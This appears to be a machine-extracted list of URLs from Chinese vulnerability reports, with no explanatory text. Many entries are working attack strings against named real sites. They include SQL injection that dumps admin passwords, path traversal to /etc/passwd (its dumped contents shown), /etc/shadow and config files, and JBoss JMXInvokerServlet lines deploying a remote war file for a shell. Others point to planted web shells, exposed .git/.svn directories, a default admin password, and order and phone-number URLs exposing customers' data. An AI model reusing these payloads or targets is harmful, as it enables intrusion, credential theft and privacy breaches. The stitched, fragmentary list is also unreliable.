http://www.dtzwdt.gov.cn/portal/xzsp3/newlist2.aspx?columntitle=%E5%A4%A7%E5%8E%85%E5%88%B6%E5%BA%A6 http://121.30.211.2:81/portal/lingqiuxian_xzsp3/newlist2.aspx?columntitle=%E5%A4%A7%E5%8E%85%E5%88%B6%E5%BA%A6 http://211.142.37.152:85/portal/xzsp3//newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://121.30.251.3:85/portal/xzsp3//newlist2.aspx?columntitle=%E8%A7%84%E7%AB%A0%E5%88%B6%E5%BA%A6 http://www.sdbcn.net http://222.175.126.77 http://www.sdbcn.net:8080/UMS_Web_Update/jsp/UMS3_Web/UMS_ApplyReg.jsp http://222.175.126.77:8080/invoker/JMXInvokerServlet http://222.175.126.77:8080/invoker/JMXInvokerServlet system:service=MainDeployer http://p2j.cn/is.war http://59.151.102.45/ems http://zhaopin.cnooc.com.cn/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml http://zhaopin.cnooc.com.cn:90/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml http://zhaopin.cnooc.com.cn/hrss/attach.download.d?appName=PSNBASDOC_RM&pkAttach=null http://zhaopin.cnooc.com.cn/hrss/ref.show.d?refcode=HI000000000000000003 http://www.bjlylq.com.cn/second.asp?id=13 http://121.10.24.134:28017/ http://bi.anzhi.com:9914/ http://down.chinaz.com/soft/33718.htm http://网址/showinfo/index.asp?pone=48&id=88%20union%20select%201,UserName,3,4,Password,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26%20from%20Admin http://res.10010js.com/ http://res.10010js.com/agent/smrz/ http://www.zdlife.com/front/downLoad.do?resourceUrl=/../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin tomcat:x:500:500::/home/tomcat:/bin/bash rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin http://www.oneplus.cn/user/addr/query http://ko.7daysinn.cn:7711 http://ko.7daysinn.cn:7711/web.txt http://192.168.74.103:7703/Service.asmx"/ http://49.5.4.44 http://49.5.4.44/jmx-console/ http://49.5.4.44/invoker/JMXInvokerServlet http://bbs.junzhuan.com/uc_server/data/config.inc.php.bak http://www.zjhrss.gov.cn/download/downfile.jsp?pathfile=download/downfile.jsp&sitename=zjstmhwz http://wap.szkuniu.com/admin/ http://wap.szkuniu.com:80/ http://wooyun.org/bugs/wooyun-2010-087662 http://www.nbccts.com/visathree.aspx?vid=%E6%96%B0%E5%8A%A0%E5%9D%A1 http://role.wanmei.com//tool/serverlist/server!getName.action http://122.228.76.107:8080/ http://60.247.79.29/ http://60.247.79.29:8383/ http://bbs.scgl.dota2.com.cn/ http://bbs.ts.wanmei.com http://mall.51wan.com/address_index_update_1804.html http://mall.51wan.com/address_index_update_1800.html http://mall.51wan.com/address_index_update_2.html http://crm.7daysinn.cn/ http://blog.sohu.com/s/MTg0NjgxNTA2/262808870.html http://124.129.19.86/zh_cn/webui.html http://www.ks2y.com/cms/ZJCX.aspx?LMID=69 http://www.zjtongde.com/cms/zjcx.aspx?lmid=69 http://www.z2hospital.com/cms/mzpb1.aspx?LMID=56 http://www.zjqhyy.com/cms/mzpb1.aspx?LMID=26 http://www.hz3yy.com/Job.aspx?MID=249 http://www.zjhl.org/cms/Job.aspx?LMID=63 http://www.zjqhyy.com/cms/Job.aspx?LMID=6 huizhi2000.xicp.net/common/web_meeting/index.php http://service.wanmei.com http://service.wanmei.com/ http://222.222.131.248/ http://www.linekong.com/job/ www.csytv.com http://www.csytv.com/.svn/entries http://xadmin.wanhui.cn/login/index http://219.235.129.108:8080/NewManager/,如图 http://219.235.129.108:8080/NewManager/admin/login.action,测试如下: http://219.235.129.108:8080/NewManager/shell.jsp,如图 http://120.202.47.158:8083/machineIndex.action http://120.202.47.158:8083/wsdt/showWssbIndex.action http://lygdlzxyey.com/tushu/default.asp http://www.gyxsqex.com/tushu/default.asp http://lsxnmxx.js.cn:41516/tushu/default.asp http://www.gyxjsxx.com//tushu/default.asp http://112.4.228.169:880/default.asp http://xytest.staff.xdf.cn http://60.191.106.201/left.asp http://60.191.106.201/tz.asp,然后喵了一下 https://58.221.91.194/login.html http://58.30.254.17:9200/admin-console/ http://58.30.254.17:9200/jmx-console/ http://www.ggjrw.com/e/member/zhengce/save.php http://60.28.251.218:8080/resin-admin/status.php https://github.com/PingPlusPlus/pingpp-go/blob/ff92ac0047ccb1356f1abc67f479b1b1521cec3e/paytest.go http://test.pinpula.com:8989/ https://github.com/ark930/upmp-mer-test/blob/ba7ad5c22c4b623a1f433fc4ff3efa78752eeff8/util/mail.py http://b2b.flnet.com/ admin:123456 http://www.donews.com/specialqc/tool/feedback.php?bid=1 http://member.bytevalue.com/bytevalue.tar.gz http://58.216.10.38/phpmyadmin/ http://www.bytevalue.com/bvos/ http://58.216.10.38/phpinfo.php http://member.bytevalue.com/crossdomain.xml http://58.216.10.38/p.php http://member.bytevalue.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=11 http://jinan.youshang.com/help/kiszyb/search.php?q=123 http://jinan.youshang.com/help/kiszyb/search.php?q=123 http://demo.cse.edu.cn/JYXH/ZiYuanCenter.aspx?channelID=000000080001 http://58.23.113.19:8886/urc/login/LoginSuccess.do http://58.23.113.19:8886/urc/help/zh/manual.htm http://58.23.113.19:8886/urc/xz01/h01/h0101/H0101Retrieve.do http://meijugou.focus.cn http://www.phys.sinica.edu.tw/directory_user.php?id_key=7 http://vb.vlinkage.com http://223.100.49.52/ http://223.100.49.51/ http://wiki.hexun.com http://wiki.hexun.com/search.aspx?q= http://61.233.6.86/login.do http://61.233.6.86/jmx-console http://61.233.6.86/invoker/JMXInvokerServlet http://wwwdemo.wandafilm.com//user/myCoupons.do?m=giveCoupons http://wwwdemo.wandafilm.com http://fripside.sinaapp.com/1aaa.js http://gbsztest.daxiangqun.net/index.php/Index/search http://erp.foxitsoftware.cn http://logistics.flnet.com/ www.ntfybj.com/interface/yygh/ser-center/ https://github.com/hewr1993/heartbeat/blob/147a0e84a9d4b7c78dd44914c4879868da413f50/heartbeat.py https://42.156.162.10 https://sso.aliloan.com https://ecdcc.aliloan.com http://rsc.em.swjtu.edu.cn/newsinfo.asp?id=123 http://rsc.em.swjtu.edu.cn/admin/Login.asp http://www.sasacgs.gov.cn/leaderList.jsp?lab=3&classid=23 https://my.guanaitong.com/index.php?m=p_address&a=change&id=00001 http://hui.aili.com/ http://hunjia.55bbs.com/files/bride/list.php?s=1&q=&page=396 http://61.142.174.200/cwc/KFweb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://cycwc.gzife.edu.cn/kefa/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://cw.syu.edu.cn:8080/KfWeb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://58.16.80.232/kefa/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://221.5.51.228/cjb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://www.shcdkf.com/kfweb/admin/v_ztSf.aspx?id=DataList1_ctl01_myiframe&gh=1997102001 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110 http://www.gzzyhk.com/ http://www.gobooking.cn/newquery/admin-manager/gnTicketManager/order_viewedit.asp?order_id=20100121143350 http://www.bjhxjipiao.com http://82750000.com/ http://www.antai1688.com http://jp-053282723000.com/ http://www.qdfh-air.com http://www.gzhuaju.net http://www.83885886.cn http://www.js-air.com/ http://www.jq166.com http://www.4006222886.com http://www.osenair.com/ http://iosappapi.wepiao.com/?m=web&c=film&a=filmdetail&fid=5577 http://m.hylinkad.com http://m.hylinkad.com/hylinkad/createSignature.do http://m.hylinkad.com/jobsManage/saveHeadPic.do http://m.hylinkad.com/jobsManage/saveUserInfo.do http://m.hylinkad.com/jobsManage/saveUserInfo.do http://tg.tttuangou.net/ http://sg.myj.com.cn/order/detail/2147217 http://v2.xkeshi.com/shop?key=* http://tv.sohu.com/feihuindex4/ http://y.memewan.com/a6.htm这一个广告的页面 http://www.600bbb.cn/这一个网站中 http://wms.flnet.com/ http://www.awotuan.com/.svn/entries http://www.zpsoso.com/.svn/entries http://www.xiushao.com/.svn/entries http://www.pailezu.com/.svn/entries http://www.tuanai.com/.svn/entries http://mobile.ipe.org.cn/app/app_V2.asmx?op=ModifyUser_PwdValidateCode http://mobile.ipe.org.cn/app/app_V2.asmx?op=ModifyUser_PwdValidateCode http://**.**.**/UserManage/Login.aspx http://www.bjprd.com.cn:88/PreciousE/common/infoList.asp?str=1 http://210.30.190.86/PreciousE/common/infoList.asp?str=2 http://zcgl.usc.edu.cn/gzyq/common/infoList.asp?str=1 http://202.119.206.110/PreciousE/common/infoList.asp?str=1 http://sbgx.nefu.edu.cn/peweb/common/infoList.asp?str=1 http://202.201.152.152/pe/common/infoList.asp?str=1 http://202.118.31.223:801/pe/common/infoList.asp?str=1 http://pxzx.zjdpc.gov.cn/ZXJJ.aspx?t=9存在注入 http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd http://www.w3.org/1999/xhtml float:left display:block;height:40px;line-height:40px;color:#FF6600;font-family:Verdana,Geneva,sans-serif;font-weight:bold margin-top:10px;float:left display:block float:left;font-size:12px text-align:left padding-left:20px height:40px line-height:40px margin-left:10px http://t.jiwu.com/agent!tofindpwd.action# https://www.google.co.jp/?gfe_rd=cr&ei=KmxpVezNLITWuALnyYD4Cw#q=site:chaoxing.com+portal/schoolCourseInfo/courseOutline&safe=off&filter=0 http://muc.benke.chaoxing.com/portal/schoolCourseInfo/courseOutline?courseName=*&pageNum=4 http://muc.benke.chaoxing.com/portal/schoolCourseInfo/courseOutline?courseName=*&pageNum=4 http://**.**.**/ http://design.moonbasa.com/star/wp-login.php http://ss.linekong.com/xml/common.php?num=5&sort_id=97 IP:218.207.123.15 http://gzb2.net/News/gzb_mng/Login.asp http://hr.ztgame.com/ http://www.dyshxx.com:235/dylgy/login.aspx http://tmctest.careland.com.cn/dbtools/data/ http://mss.alxd.com.cn/user/ http://www.rz.com/index.php http://ee.cqupt.edu.cn/search.php Database:bishe http://202.85.212.108:8080/login!login.do http://hongyan.cqupt.edu.cn/gjpd/zyjn/admin/admin.php http://**.**.**/_ http://www.baidu.com/s?ie=UTF-8&wd=Copyright+ATA+1999-2008.+All+Rights+Reserved http://www.228.com.cn/customer/login.html www.shmgc.com http://oa.cntmi.com/ http://58.30.56.38/ http://58.30.56.38/invoker/JMXInvokerServlet部署war进行getshell http://58.30.56.38/invoker/JMXInvokerServlet system:service=MainDeployer http://p2j.cn/is.war http://credit.xkeshi.com/user/login;jsessionid=1wwfhwvdrff50v32yk1wdjd3b http://www.js808.cn/ind/pass_step1.html http://abtest.moonbasa.com/admin/ http://61.142.174.200/cwc/KFweb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://cycwc.gzife.edu.cn/kefa//admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://cw.syu.edu.cn:8080/KfWeb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://58.16.80.232/kefa/admin//v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://221.5.51.228/cjb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://www.shcdkf.com/kfweb/admin/v_zt.aspx?id=DataList1_ctl01_myiframe&gh=2012107008 http://woa.unicomgd.com/moa/jrfx/sssr.aspx?type=003 http://woa.unicomgd.com/moa.files/CNCROOTCA.cer http://www.ks2y.com/cms/GuestBook.aspx?LMID=49 http://www.z2hospital.com/cms/GuestBook.aspx?lmid=111 http://www.hnzyy.cn/cms/GuestBook.aspx?LMID=49 http://www.ksskfyy.com/cms/GuestBook.aspx?lmid=955 http://www.zjcc.org.cn:8000/cms/GuestBook.aspx?lmid=58 http://www.ks2y.com/cms/mzpb2.aspx?LMID=102 http://sig.cem.org.cn/cms/mzpb2.aspx?LMID=57 http://www.z2hospital.com/cms/mzpb2.aspx?LMID=57 http://pic.3234.com/config.inc.php pdo:mysql https://github.com/githubpaul/rackmonkey/blob/eb94bbdace564ba00ed5895996530fdf062380f4/conf/httpd-rackmonkey.conf http://cloud.inspur.com/icpserver/uu/inputAccountInfo.do http://urp.tongji.edu.cn/userAttributesView.portal?userId=amAdmin http://urp.tongji.edu.cn/getBackPassword.portal http://urp.tongji.edu.cn/ http://cloud.inspur.com/solr/#/ URL:http://fanli.mizhe.com/mz_comment/lists_mall.html http://yanshi.nuoran.net/1273/admin http://mobile.qiandw.com/Weily/ http://mobile.qiandw.com/Weily/Conf/weily.db encryption:TTept6iU8Jd5mhOCirsW49yugxvzMfdB2Vxnl812nhE+Zh6xY5hpUXa/tKXKi3uYuSHMUsFoMmKWoVX4y9jOpQ== http://bobao.360.cn/learning/detail/163.html http://law.cqupt.edu.cn/kecheng/mf/exam.php?id=&cat_id=10 http://123.234.41.25 http://123.234.41.25/web/shell.asp http://60.2.126.26:9999/ggsjzx/userlogin.action http://imusic.wo.com.cn http://imusic.wo.com.cn/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/root/.bash_history http://115.236.77.174:81/.svn/entries http://baike.huaji.com/.svn/entries http://shop.huaji.com/.svn/entries http://bbs.huaji.com/images/wind/file/.svn/entries http://bbs.huaji.com/.svn/entries http://bbs.huaji.com/images/face/.svn/entries http://bbs.huaji.com/images/post/smile/wangwang/.svn/entries http://bbs.huaji.com/images/post/smile/default/.svn/entries http://bbs.huaji.com/images/wind/level/.svn/entries http://bbs.huaji.com/images/wind/thread/.svn/entries http://bbs.huaji.com/images/.svn/entries http://bbs.huaji.com/images/wind/index/.svn/entries http://a.huaji.com/server-status http://help.huaji.com/server-status http://115.236.77.174 http://bbs.xiaoyuer.com/ucenter/data/tmp/upload1251.jpg/.php www.upyun.com http://www.17u.com/ http://111.12.219.18/Login.aspx http://www.citicsf.com/download.jsp?fileName=../WEB-INF/web.xml http://java.sun.com/xml/ns/j2ee xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd http://www.citicsf.com/ inurl:/epaper http://epaper.cmt.com.cn/epaper/uniflows/html/2015/05/29/K-01/default.htm http://zcrb.zcwin.com/epaper/ http://szb.xgrb.cn:9999/epaper/xgwb/html/2015/06/02/01/default.htm http://szb.dingzhoudaily.com:10000/epaper/paper.jsp?papername=%B6%A8%D6%DD http://www.zgkjb.com.cn/epaper/uniflows/html/2015/03/13/boardpicurl.htm http://dyrb.dy001.cn:9999/epaper/dyrb/html/2015/05/23/02/02_54.html http://www.pyxww.cn:8080/epaper/paper.jsp?papername= http://www.yongxin.gov.cn/epaper/uniflows/20150406/01/01_33.htm http://124.42.72.218/epaper/uniflows/html/2015/05/29/06/default.htm http://www.lasa-eveningnews.com.cn/epaper/uniflows/html/2015/05/29/02/default.htm http://lqszb.zjol.com.cn/epaper/lq/html/2014/11/17/02/default.htm http://www.hbnews.net/epaper/hbrb/html/2014/10/17/1/default.htm http://xyz.lsol.com.cn/epaper/search/index.jsp http://www.lznews.gov.cn:9999/epaper/lzrb/html/2015/06/02/01/default.htm http://szb.zgsynews.com/epaper/xsy/html/2015/05/05/1/1_42.htm http://nnrb.nnnews.net:9999/epaper/nnrb/html/2013/03/26/00/default.htm http://58.42.132.75:8080/epaper/trrb/html/ http://bhrb.beihai.gov.cn:8080/epaper/bhwb/html/2015/06/01/01/default.htm http://www.grainnews.com.cn:9998/epaper/uniflows/html/2015/04/02/boardpicurl.htm http://58.214.255.28/epaper/wxxzk/html/2014/12/19/B05/B05_29.htm http://epaper.dydaily.com.cn:9999/epaper/dyrb/html/2015/06/02/01/default.htm http://szb.xgrb.cn:9999/epaper/ http://114.113.148.102/epaper/uniflows/html/2015/04/24/K-02/default.htm http://www.baoshandaily.com:8080/epaper/search/index.jsp http://epaper.shaoyangnews.net/epaper/syrb/html/2010/01/30/04/04_55.htm http://ldrb.xxcmw.com:81/epaper/ldrb/html/2014/12/20/01/01_69.htm http://61.153.66.148/epaper/search/index.jsp http://www.ceh.com.cn/epaper/uniflows/html/2015/06/02/A01/default.htm http://122.224.69.77:9999/epaper/uniflows/html/2013/09/09/01/01_130.htm http://219.156.123.48:8080/epaper/uniflows/hnfzb/2015/01/21/11/11_53.htm http://www.zhongchou.com/settings-save_consignee http://61.142.174.200/cwc/KFweb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://cycwc.gzife.edu.cn/kefa/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://cw.syu.edu.cn:8080/KfWeb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://58.16.80.232/kefa/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://221.5.51.228/cjb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.shcdkf.com/kfweb/admin/v_ztCw.aspx?id=Repeater1_ctl01_myiframe&gh=2012107008&value=00&text=%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.wooyun.org/bugs/wooyun-2010-097645/ http://blood.sdo.com/NewsApp/GetVoteInfo.ashx?naId=1&bm=utf-8&t=0.3482579686222665&jsoncallback=jQuery110206128954326713232_1433462792000&_=1433462792002&nacId=217818 http://61.142.174.200/cwc/KFweb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://cycwc.gzife.edu.cn/kefa//admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://cw.syu.edu.cn:8080/KfWeb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://58.16.80.232/kefa/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://221.5.51.228/cjb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://www.shcdkf.com/kfweb/admin/admin_showxmlist.aspx?id=myname0&gh=2012108011 http://58.67.199.170:8090/ http://58.67.199.170:8090/hawtio/ http://58.67.199.170:8090/admin/ http://178.ctbclife.com/ASP/parkingFund.asp http://123.232.100.133:8080/WEBOA/control/main http://123.232.100.133:8080/jmx-console/部署war拿shell http://ibi.cqupt.edu.cn/report.php?term=28 www.352.com http://www.352.com http://edu.csdn.net/courses?attr=3&c_id=0&level=1 http://www.xkb.com.cn/.git/ https://ibank.bankofdl.com/perbank/downloadTransferList.do https://ibank.bankofdl.com/perbank/showBuySavingsConfirmPage.do https://ibank.bankofdl.com/perbank/queryProductLimit.do http://61.148.24.182:8080, http://61.148.24.182:8080/acc/bindipmac/static_arp_setting_content.php?arpName=123%27%20union%20select%201,1,1,1,1,1,1,%28select%20password%20from%20USERINFO%29-- http://61.148.24.182:8080/acc/bindipmac/static_arp_include.php?ifName=123%27%20order%20by%202-- http://shop.js808.cn/ http://www.js808.cc/handle/getHelpContent.ashx?id=47 http://www.js808.cc/handle/getHelpContent.ashx?id=47 http://m.ly.com/bus/BusJson/DestinationCity http://www.beibei.com/ https://github.com/salever/weixin/blob/5bf0fcc7aab91081322027b47321a3c94a4fe5de/java-weixin-sdk/src/main/resources/config.properties http://www.yyth.com.cn/position/zp_index.php?id=5 http://www.yyth.com.cn/position/zp_index.php?id=5 http://sqlmap.org http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://shop.vivo.com.cn/gallery-ajax_get_goods.html http://shop.vivo.com.cn index.php/admin/authentication/forgotpassword http://survey.xoyo.com http://www.concords.com.tw/event/event_data_view.asp?ID=492 http://ischool.edu.sina.com/school/lists.html?country=&course_style=1 http://ischool.edu.sina.com/school/lists.html?keyword=1 http://ischool.edu.sina.com/school/lists.html?page=\&school_city=171&school_prov=8 http://s.readnovel.com/.svn/entries www.dlb666.com http://ag.mcds.com/ http://sms.mcds.com/index.nja http://m.zhenpin.com/.svn/entries http://www.hyjsjd.cn/UnitValue.aspx?id=0100061 http://218.7.239.170:81//UnitValue.aspx?id=0100061 http://www.spjdz.com//UnitValue.aspx?id=0100061 http://www.thszjz.com//UnitValue.aspx?id=0100061 http://www.jljszj.gov.cn//UnitValue.aspx?id=0100061 http://59.151.121.82/ http://baike.huaji.com/index.php?edition-compare-1 http://m.beibei.com/ http://m.beibei.com/detail/detail.html?iid=1969733 http://m.beibei.com/trade/cart.html www.beibei.com的订单中心看一下详情吧。 https://github.com/Kevin2030/finance_monitor/blob/9c4ffc8dd773ee072648de3a2e5d7b8afabf638a/src/main/resources/monitor.properties www.go.cn https://technet.microsoft.com/en-us/library/cc960241.aspx http://www.lefucn.com/index.php?r=home/default/expert1&category=1 http://guso.zszq.com:88/detail.asp?d=123&t=C227 www.esunsec.com.tw/z/zk/zkf/zkResult2.asp http://www.16wifi.com/usersystem/log.txt http://ads.zhongsou.com/.svn/entries http://www.zsb.ynutcm.edu.cn/wcm/customform/list.html?projectid=2 http://apzx.gzaj.gov.cn//wcm/customform/list.html?projectid=2 http://test.gzaj.gov.cn//wcm/customform/list.html?projectid=2 http://fwzx.gzaj.gov.cn//wcm/customform/list.html?projectid=2 http://gzaj.gov.cn/wcm/customform/list.html?projectid=34 http://www.gaxq.gov.cn/wcm/customform/list.html?projectid=283 http://club.kingdee.com/ http://club.kingdee.com/home.php?mod=spacecp&ac=profile&op=address&address_action=del&areaid=350 http://kefu.xoyo.com http://221.214.13.10:5003/login.aspx http://221.214.13.10:5003/CZFW_Details.aspx?id=RN2722 http://221.214.13.10:5003/FZ_Details.aspx?id=RN37010220150321091708001 http://221.214.13.10:5003/FZ_Details.aspx?id=RN37010220130326121024001 http://221.214.13.10:5003/FZ_Details.aspx?id=RN37010220130327164325001 http://m.wanzhoumo.com/.git/config http://light.wanzhoumo.com/.git/config http://openapi.wanzhoumo.com/.git/config http://www.wanzhoumo.com/.git/config www.wanzhoumo.com www.ikonke.com http://www.lk34.com/ http://218.92.102.170:9090/ url:http://www.hbqx.gov.cn:8081/admin/index.jsp http://wenku.baidu.com/view/2b6ec2acaef8941ea76e05b8.html https://202.110.92.42/ http://sales.feiren.com/admin/login_login.do http://sales.feiren.com/2.jsp http://group.tempus.cn//pw/job2/ui/employ_introduce.aspx?company_id=178 http://m.suning.com/dl/qJeA5UsD.html http://www.wooyun.org/whitehats/%E5%B0%8F%E6%89%8B%E5%86%B0%E5%87%89#suning.com suning://m.suning.com/index?adTypeCode=1002&adId=http://m.suning.com/ http://31.220.48.93:28214/sn/jm.html http://drops.wooyun.org/papers/548。在android http://31.220.48.93:28214/sn/ls_0.html https://github.com/jjkakakk/ajihttpd/blob/master/sms.html)读文件等等,而这些命令的执行权限正好是苏宁易购本身,所以正好能够配合0x03读取用户数据文件 http://124.237.87.30/ http://a.m.163.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=file:///etc/shadowhttp://a.m.163.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=file:///etc/shadow http://a.m.163.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=var/lib/locate.db%20?file=../../../../../../../../../var/lib/locate.db%20?file=../../../../../../../../../var/lib/mlocate/mlocate.db http://www.352.com/member/info/agreeInfoById.do?id=1111 http://www.352.com/member/info/agreeInfoById.do?id=2222 http://www.352.com/member/info/agreeInfoById.do?id=7777 http://cservice.client.189.cn:8004/map/clientXML?encrypted=true http://sdfz.gwbnsh.net.cn/ https://115.159.64.131/.svn/entries http://pay.qun.hk/.svn/entries http://www.hbjjzd.cn/detail.php?code=808&table_name=tb_common http://202.117.122.44//dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://211.81.174.133:81/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://210.37.2.181/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://202.118.250.140/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://210.34.4.3/dlib/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://202.195.177.13/ebook/homepage/bulletin/bulletin_list.asp?action=list&lang=gb http://ebook.nwu.edu.cn/homepage/bulletin/bulletin_list.asp?lang=gb&action=list http://101.227.68.201:8099/Login.aspx http://124.237.87.30/ http://222.210.17.165/zsjhW.asp?KYear=2015 http://222.210.17.165/xsdh.asp?id=137&CName=%C8%EB%D1%A7%C6%AA http://222.210.17.165/xkjs.asp?ID=126&CName=%BD%B1%B4%FB%D6%FA%D1%A7等 http://www.hbqx.gov.cn:8081/search_list.action http://www.jiayuabc.com/kecheng_info.aspx?News_Id=624000000000 http://mp.yiban.cn/ http://www.kflib.cn:8089/opac/dzxmjs.jsp http://scsk.crsp.org.cn:8070/opac/dzxmjs.jsp http://211.86.195.15:8086/opac/dzxmjs.jsp http://scsk.crsp.org.cn:8070/opac/dzxmjs.jsp http://58.133.216.9:8070/opac/dzxmjs.jsp http://www.kflib.cn:8090/opac/dzxmjs.jsp http://58.118.253.4:8070/opac/dzxmjs.jsp http://222.56.16.81:8089/opac/dzxmjs.jsp http://lib.hhhxy.cn:88/opac/dzxmjs.jsp http://59.51.114.198:8088/opac/dzxmjs.jsp http://tsjs.ndjclib.com:8070/opac/dzxmjs.jsp http://scsk.crsp.org.cn:8070/opac/dzxmjs.jsp URL:https://passport.vivo.com.cn/v3/web/login/login POST:client_id=&redirect_uri=&account=*****&pwd=*****&remember=0 http://www.zlsbpjw.net http://www.xc777.com http://www.0714.la http://www.haochibu.com http://dianping.alexue.com http://www.xishan100.com http://b2a.airkunming.com/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX201504126391535 http://b2a.airkunming.com/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX201504126391536 http://b2b.shenzhenair.com/b2b/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX2015031121397968 http://b2b.shenzhenair.com/b2b/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX2015031121397969 http://www.showjoy.com/p/146413.html http://www.showjoy.com/p/148750.html http://www.showjoy.com/p/148750.html http://fenxiaoportal.shopnum1.com/ http://www.dapeng.net http://www.minjumall.com/ http://www.qjzb.com.cn/ http://www.xiangliangan.com/ http://www.ctnz.net/orderAction!orderFinishPay?orderRecForm.orderRecId=20150415-CTNZ-914072&orderRecForm.memberId=201304121166350&orderRecForm.thirdPayTotalFee=118.00&orderRecForm.thirdPaySubject=%E5%8C%97%E4%BB%91+2015-04-17+13:35 http://www.ctnz.net/orderAction!orderFinishPay?orderRecForm.orderRecId=20150415-CTNZ-914072&orderRecForm.memberId=201304121166353&orderRecForm.thirdPayTotalFee=118.00&orderRecForm.thirdPaySubject=%E5%8C%97%E4%BB%91+2015-04-17+13:35 http://mall.cmbchina.com/Order/OrderDetailGuest.aspx?sosysno=40304622&phonenumber=13811567135 http://mall.cmbchina.com/Order/OrderDetailGuest.aspx?sosysno=48442031&phonenumber=13922484972 http://pan.kingdee.com/ http://gprsb.ttkd.cn/e3oa/wtj/down.asp?action=%E8%A1%8C%E6%94%BF http://www.job.sdu.edu.cn/)Struts2的DevMode未关闭导致远程命令执行;网站用户为root导致危害性扩大,入侵者可随意执行命令。 http://www.job.sdu.edu.cn/)后台管理admin的密码的,想必网站的后台入口就是http://www.job.sdu.edu.cn/admin,在浏览器中输入该URL,出来的竟然是这个 http://xunjian.club.xywy.com http://dangan.app.xywy.com http://mxunjian.club.xywy.com 